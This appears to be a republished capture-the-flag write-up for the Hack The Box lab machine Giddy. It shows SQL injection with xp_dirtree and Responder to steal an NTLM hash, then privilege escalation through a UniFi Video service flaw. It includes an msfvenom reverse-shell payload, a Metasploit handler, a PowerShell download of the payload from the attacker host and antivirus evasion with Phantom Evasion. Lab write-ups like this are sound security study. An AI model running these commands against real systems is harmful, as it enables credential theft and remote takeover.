47

Hack The Box - Giddy

 3 years ago
source link: https://www.tuicool.com/articles/hit/yqeYFfY
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Quick Summary

Hey guys today Giddy retired and this is my write-up. Giddy was a nice windows box , This box had a nice sqli vulnerability which we will use to steal ntlm hashes and login , Then the privilege escalation was a Local Privilege Escalation vulnerability in a software called Ubiquiti UniFi Video which also was a cool vulnerability , I had fun doing this box as it was a challenging one. It’s a windows box and its ip is 10.10.10.104 , I added it to /etc/hosts as giddy.htb . Let’s jump right in.

AjIZfiB.png!web

Nmap

As always we will start with nmap to scan for open ports and services :

nmap -sV -sT -sC giddy.htb Qj63UrM.png!web

nmap tells us that port 80 and 443 are open and running http , port 3389 is also open and it says “Microsoft Terminal Services”, Let’s check http

HTTP Enumeration

On http (port 80) there’s only this picture :

NRRbIvQ.png!web

Also the same picture on https (port 443)

FjERVfj.png!web

Let’s run gobuster with directory-list-2.3-medium.txt and see what we will get

gobuster -u http://giddy.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -to 250s

Results :

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)                                                                                       
=====================================================                                                                                       
[+] Mode         : dir                                                                                                                      
[+] Url/Domain   : http://giddy.htb/                                                                                                        
[+] Threads      : 100                                                                                                                      
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                                                             
[+] Status codes : 200,204,301,302,307,403                                                                                                  
[+] Timeout      : 4m10s                                                                                                                    
=====================================================                                                                                       
2019/02/15 21:36:09 Starting gobuster                                                                                                       
=====================================================
/remote (Status: 302)
/mvc (Status: 301)

We got 2 sub directories /remote and /mvc

Let’s take a look at /remote :

byeA3aU.png!web

It redirects us to this page titled as Windows PowerShell Web Access , we don’t have any credentials so we can ignore this for now and check /mvc

bYJrIf6.png!web

And we get this ASP.NET application

SQLI and getting User

After some regular enumeration we will find that when we click on a product name we get something like this :

UZvAJbV.png!web

The url has a parameter called ProductSubCategoryId , and if we try a single quote ' :

RZv2mi7.png!web

We get an error saying “Unclosed quotation mark after the character string” so this parameter is sql injectable , let’s try something like 1; UPDATE Product SET Name= ''

UnYzYnI.png!web

And we see that it dumped the products, we can run responder and use xpdirtree to make it try to connect to us , you can read about xpdirtree here

To do this let’s run responder first responder -I tun0

Then let’s use xpdirtree : 1; EXEC MASTER.sys.xp_dirtree '\\10.10.xx.xx\fakeshare'

aAJfUnA.png!web

What is this doing is simply running a fake smb server with responder that steals ntlm hashes , then by using xpdirtree we make the server try to connect to our fake smb server. Let’s check responder now :

QrQZFr7.png!web

We captured ntlm hash for a user called Stacy , Let’s crack the hash with john

AB3MraY.png!web

And the password is xNnWo6272k7x , let’s use the PowerShell Web Access

JfARbq6.png!web

We ge this web interface for powershell :

biyuUrJ.png!web

We can get the user flag now :

M3m2mir.png!web

And we owned user !

unifivideo local privilege escalation

If we return to Documents again we will find a file called unifivideo

nUv6vib.png!web

UniFi Video is a powerful and flexible, integrated IP video management surveillance system designed to work with Ubiquiti’s UniFi Video Camera product line. UniFi Video has an intuitive, configurable, and feature‑packed user interface with advanced features such as motion detection, auto‑discovery, user-level security, storage management, reporting, and mobile device support.  

A quick google search and we will find that an old version of unifivideo had a local privilege escalation vulnerability , check it here

What’s happening is , Upon the start of the service “Ubiquiti UniFi Video” it tries to execute a file called taskkill.exe in C:\ProgramData\unifi-video\ but that file doesn’t exist by default , if we have write permissions to that directory we can place our payload there as taskkill.exe then restart the service. And because the service runs with privileged permissions , it will be excuted as administrator.

Let’s first create a payload with msfvenom :

msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.xx.xx LPORT=1337 -f exe > taskkill.exe Qnq2Az7.png!web

We will set up the handler on metasploit :

use multi/handler set payload windows/meterpreter_reverse_tcp set LHOST 10.10.xx.xx set LPORT 1337

Then we will run a simple http server with python to host the payload

python -m SimpleHTTPServer 80

After that we will download the file , since we are on powershell we can do this :

Invoke-WebRequest -o taskkill.exe http://10.10.xx.xx/taskkill.exe

Then we will stop the service :

Stop-Service "Ubiquiti UniFi Video" v2ArErm.png!web

Start it again :

Start-Service "Ubiquiti UniFi Video" ZzYb2uI.png!web

Let’s check our listener

A32auuY.png!web

We didn’t get a meterpreter session !

Evading anti-virus and getting root

We didn’t get a meterpreter session because there’s some kind of anti-virus blocking our payload , so what i’m going to do is to use a framework called phantom evasion , you can get it from github

yQrq6rr.png!web

We will use [1] windows modules , then [1] shellcode injection , [4] windows shellcode injection heapalloc , after that it will ask for the payload :

3mEJVbA.png!web

We will choose Msfvenom

And for encoding we will choose [4] x86/xor_dynamic + Triple Multibyte-key xor:

6V7Rjaa.png!web

It will ask for adding multi processes behaviour , stripping and signing the executable , we will say no to all of them , then finally we will have our payload.

We will repeat what we did with the other payload again , and let’s check our listener :

yumYNvu.png!web

We got a meterpreter session and owned root !

That’s it , Feedback is appreciated !

Don’t forget to read theprevious write-ups , Tweet about the write-up if you liked it , follow on twitter for awesome resources @Ahm3d_H3sham

Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Ypuffy


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK